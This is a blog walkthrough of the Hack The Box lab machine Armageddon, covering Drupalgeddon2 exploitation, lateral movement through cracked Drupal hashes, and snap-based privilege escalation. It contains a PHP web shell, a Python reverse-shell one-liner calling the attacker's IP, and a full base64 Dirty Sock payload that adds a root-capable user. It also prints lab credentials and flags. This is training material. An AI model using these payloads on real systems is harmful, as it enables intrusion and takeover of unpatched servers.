Home Hack The Box Write-Up Armageddon - 10.10.10.233
Post
Cancel
Preview Image

Hack The Box Write-Up Armageddon - 10.10.10.233

It is not the monsters we should be afraid of; it is the people that don’t recognize the same monsters inside of themselves.

Shannon L. Alder

About Armageddon

In this post, I’m writing a write-up for the machine Armageddon from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills

Armageddon is a ‘Medium’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 15 and submitting the root flag you points will be raised by 30.

Foothold

User

Root

Machine Info

Machine Name: Armageddon
Difficulty: Medium
Points: 30
Release Date: 27 Mar 2021
IP: 10.10.10.233
Creator: bertolis

Recon

Port scan with Nmap

As always we start the machine with a port scan with Nmap.

1
~$ nmap -sC -sV -oA ./nmap/10.10.10.233 10.10.10.233

The results.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Starting Nmap 7.90SVN ( https://nmap.org ) at 2021-04-28 21:11 CEST
Nmap scan report for 10.10.10.233
Host is up (0.30s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to  Armageddon |  Armageddon

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.01 seconds

The port scan discovered two open ports. The first port is the default SSH port 22/tcp. The second port is the default HTTP port 80/tcp. From the output, we can see that this webserver is running Drupal 7 and we can find some web directories.

Enumeration

Enumeration Web Server

Let’s start with the enumeration with the webserver. We can first start the web directory brute-forcing with fuff. We know we can find other interesting directories or files.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
~$ ffuf -c -w ../../wordlists/wfuzz/general/big.txt -u http://10.10.10.233/FUZZ
 

         /'___\  /'___\           /'___\       
        /\ \__/ /\ \__/  __  __  /\ \__/       
        \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
         \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
          \ \_\   \ \_\  \ \____/  \ \_\       
           \/_/    \/_/   \/___/    \/_/       
 

        v1.2.0-git
 ________________________________________________
 

 :: Method           : GET
 :: URL              : http://10.10.10.233/FUZZ
 :: Wordlist         : FUZZ: ../../wordlists/wfuzz/general/big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
 _______________________________________________
 

cgi-bin/                [Status: 403, Size: 210, Words: 15, Lines: 9]
includes                [Status: 301, Size: 237, Words: 14, Lines: 8]
misc                    [Status: 301, Size: 233, Words: 14, Lines: 8]
scripts                 [Status: 301, Size: 236, Words: 14, Lines: 8]
sites                   [Status: 301, Size: 234, Words: 14, Lines: 8]
:: Progress: [3024/3024] :: Job [1/1] :: 332 req/sec :: Duration: [0:00:12] :: Errors: 0 ::

We visit the website through URL http://10.10.10.233. We are ending up on the webpage shown below.

Hack-The-Box-Armageddon-website

The name of this machine is Armageddon and we have a website running on Drupal 7. This cannot be a coincidence; it has to be something to do with Drupalgeddon. Before we dive into the Drupalgeddon vulnerabilities, let’s first check which version of Drupal 7 is running on this machine. For that, we can check the CHANGELOG.txt file on location http://10.10.10.233/CHANGELOG.txt. Let’s do a curl request to this file to read the contents.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
~$ curl 10.10.10.233/CHANGELOG.txt

Drupal 7.56, 2017-06-21
-----------------------
- Fixed security issues (access bypass). See SA-CORE-2017-003.

Drupal 7.55, 2017-06-07
-----------------------
- Fixed incompatibility with PHP versions 7.0.19 and 7.1.5 due to duplicate
  DATE_RFC7231 definition. 
...

This machine is running Drupal 7.56 from 2017. As it’s now 2021 this version of Drupal is very outdated. Let’s check which vulnerability can be used for this version of Drupal.

~$ searchsploit Drupal
...
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                     | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)              | php/webapps/44542.txt 
...

There is a vulnerability found for this version of Drupal. As we already thought, this vulnerability has the name Drupalgeddon3. There are more versions of Drupalgeddon, the first one was discovered back in 2014, which was a SQL Injection vulnerability (CVE-2014-3704).

Exploitation

Drupalgeddon2 – CVE-2018-7600

There is a Metasploit module available for this exploit. There is nothing wrong with Metasploit, but for the OCSP exam, you’re not allowed to use Metasploit. Whatever I think about that, I respect that rule and because I’m also learning for OCSP, I deliberately don’t use Metasploit. So, let’s copy the Python PoC to our working directory.

1
2
3
4
5
6
7
~$ searchsploit -m exploits/php/webapps/44448.py
   Exploit: Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)
        URL: https://www.exploit-db.com/exploits/44448
          Path: /usr/local/opt/exploitdb/share/exploitdb/exploits/php/webapps/44448.py
File Type: a /usr/bin/env script text executable, ASCII text, with CRLF line terminators

Copied to: /Users/T13nn3s/htb/machines/armageddon/44448.py 

Let’s start this exploit.

1
2
3
4
5
6
7
8
9
10
11
~$ python 44448.py
################################################################
# Proof-Of-Concept for CVE-2018-7600
# by Vitalii Rudnykh
# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders
# https://github.com/a2u/CVE-2018-7600
################################################################
Provided only for educational or information purposes

Enter target url (example: https://domain.ltd/): 'http://10.10.10.233/'
Not exploitable

This is not what I expected. For some reason this script is nog working. There is also a Ruby script. Let’s jump over to that one. First, we need to copy this exploit to our working directory.

1
2
3
4
5
6
7
~$ searchsploit -m exploits/php/webapps/44449.rb
  Exploit: Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/44449
     Path: /usr/local/opt/exploitdb/share/exploitdb/exploits/php/webapps/44449.rb
File Type: Ruby script text, ASCII text, with CRLF line terminators

Copied to: /Users/madij/htb/machines/armageddon/44449.rb

Ok, now launch the exploit.

1
~$ ruby 44449.rb http://10.10.10.233

Houston, we have a problem!

I’m running are working from a Macbook. On running this payload, I got this error below:

1
2
3
4
Traceback (most recent call last):
2: from 44449.rb:16:in `<main>'
1: from /System/Library/(...)rubygems/core_ext/kernel_require.rb:54:in `require'
/System/Library/(...)/rubygems/core_ext/kernel_require.rb:54:in `require': cannot load such file -- highline/import (LoadError)

This can be fixed by installing the highligt gem, by running this command:

1
gem install highline

It’s working! We have a webshell!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.233/
--------------------------------------------------------------------------------
[+] Found  : http://10.10.10.233/CHANGELOG.txt    (HTTP Response: 200)
[+] Drupal!: v7.56
--------------------------------------------------------------------------------
[*] Testing: Form   (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution   (Method: name)
[i] Payload: echo FNVRWPMP
[+] Result : FNVRWPMP
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file   (http://10.10.10.233/shell.php)
[i] Response: HTTP 404 // Size: 5
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell:   curl 'http://10.10.10.233/shell.php' -d 'c=hostname'
armageddon.htb>> hostname
armageddon.htb
armageddon.htb>> whoami
apache 

Intrusion

Reverse shell as apache

We can now proceed to the next step. With this webshell we cannot browse through the directories, we need to create a reverse shell. We can use Python to create a webshell. So, we set our listener on port 4444. We can now start this payload to establish a reverse shell.

1
armageddon.htb>> python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.150",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 

We got now a reverse shell. Our current user account does not have the proper permissions to list files and directories on system level, so we need to move lateral to the next user account which has more privileges on this machine.

Lateral Movement

From apache to brucetherealadmin

Let’s check in the file /var/www/html/sites/default/settings.php to learn more about the database connection from Drupal.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
sh-4.2$  cat /var/www/html/sites/default/settings.php
...
$databases = array (                                                                                                                                                                     
   'default' =>
   array (
     'default' =>
     array (
       'database' => 'drupal',
       'username' => 'drupaluser',
       'password' => '[email protected]*m23gBVj',
       'host' => 'localhost',
       'port' => '',
       'driver' => 'mysql',
       'prefix' => '',
    ),
  ),
);
...

Drupal is using MySQL database with the database name drupal. We also have now the login credentials for the MySQL database. Let’s make a connection to the database drupal and get a list of all tables. We need to find the table which is holding the user accounts.

1
2
3
4
5
6
7
sh-4.2$ mysql -u drupaluser -pCQHEy@9M*m23gBVj -e "use drupal;show tables;"
...
url_alias
users
users_roles
variable
watchdog 

So, there is a table names users. Let’s get the contents of this table.

1
2
3
4
5
6
7
sh-4.2$ mysql -u drupaluser -pCQHEy@9M*m23gBVj -e "use drupal;select * from users"                                                                                                       
uid     name    pass    mail    theme   signature       signature_format        created access  login   status  timezone language        picture init    data
 0        NULL    0          0           0            0                         NULL                              0                             NULL                                                             
 1        brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt [email protected] filtered_html 1606998756 1607077194      160707627
 6       1       Europe/London           0       [email protected]     a:1:{s:7:"overlay";i:1;}                                                                                         
 3       t13nn3s $S$DbM397m15.cSfLtc422sfbYDDFtts3kCx/QheWytbVFLed24Yn9r [email protected]                  filtered_html   1619898610      0       0       0       Europe/London   0
 [email protected]  NULL 

Nice! We have now two user accounts and hashed passwords. The first user account is brucetherealadmin and the second is admin. Those hashes are Drupal7 hashes and hashcat can crack those hashes. We can place both of the hashes in a file called mysql-hashes and let’s spin up hashcat.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
~$ hashcat -a 0 -m 7900 mysql-hashes ../../wordlists/rockyou.txt 
hashcat (v6.1.1) starting... 

OpenCL API (OpenCL 1.2 (Feb 28 2021 03:51:16)) - Platform #1 [Apple]
====================================================================
* Device #1: Intel(R) Core(TM) i7-7820HQ CPU @ 2.90GHz, skipped
* Device #2: Intel(R) HD Graphics 630, 1472/1536 MB (384 MB allocatable), 24MCU
* Device #3: AMD Radeon Pro 560 Compute Engine, 4032/4096 MB (1024 MB allocatable), 16MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 2 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Uses-64-Bit
* (null)

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #3: Skipping hash-mode 7900 - known CUDA/OpenCL Runtime/Driver issue (not a hashcat issue)
             You can use --force to override, but do not report related errors.
Host memory required for this attack: 116 MB
 

Dictionary cache built:
* Filename..: ../../wordlists/rockyou.txt
* Passwords.: 14344394
* Bytes.....: 139921525
* Keyspace..: 14344387
* Runtime...: 2 secs 

 $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo 

The first hash is cracked. We got the password booboo. Let’s try to access this machine through SSH with the user account brucetherealadmin.

1
2
3
4
5
6
7
~$ ssh [email protected] 
[email protected]'s password: 
Last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5
[[email protected] ~]$ ls
user.txt
[[email protected] ~]$ cat user.txt
3a734456e236468bb03ab0aad8fb1282

We have access to the machine with SSH and we are able to read the user flag.

Privilege Escalation

Enumeration

First let’s check which permissons this user account has.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
[[email protected] ~]$ sudo -l
 Overeenkomende standaarditems voor brucetherealadmin op armageddon:
     !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR
     USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
     env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
 
Gebruiker brucetherealadmin mag de volgende opdrachten uitvoeren op armageddon:
     (root) NOPASSWD: /usr/bin/snap install * 

After a quick search on the web, we can find a local privilege escalation with the name Dirty Sock. On GitHub, we can find this exploit: https://raw.githubusercontent.com/initstring/dirty_sock/master/dirty_sockv2.py. Let’s download this payload to the /tmp folder on the Armageddon machine.

[[email protected] tmp]$ curl 10.10.16.150/dirty_sock2.py -o dirty_sock2.py
   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                  Dload  Upload   Total   Spent    Left  Speed
100  8696  100  8696    0     0  14602      0 --:--:-- --:--:-- --:--:-- 14590 

Let’s execute the payload. I had first to write the base64 payload with echo, but after several errors I decide to do it with Python.

1
[[email protected] tmp]$ python -c 'print "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A"*4256 + "=="' | base64 -d > /tmp/payload.snap

After placing the payload in the /tmp folder, we can execute this payload.

1
2
[[email protected] tmp]$ sudo /usr/bin/snap install --devmode /tmp/payload.snap
 dirty-sock 0.1 installed 

Now, we can switch to the use account dirty_sock. We can check the permissions of this account and it has full sudo permissions on this machine to run everything as root.

1
2
3
4
5
6
7
8
9
10
[[email protected] ~]$ sudo -l
 Matching Defaults entries for dirty_sock on armageddon:
     !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR
     USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
     env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
 

 User dirty_sock may run the following commands on armageddon:
     (ALL : ALL) ALL
 [[email protected] ~]$  

Last thing to do, read the root flag 🙂

1
2
3
4
[[email protected] tmp]$ su - dirty_sock
Password: 
[[email protected] ~]$ sudo cat /root/root.txt
7edc756222558e23af9712cde162a9d9 

Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856.com/profile/224856. Thanks!

Happy Hacking :-)

This post is licensed under CC BY 4.0 by the author.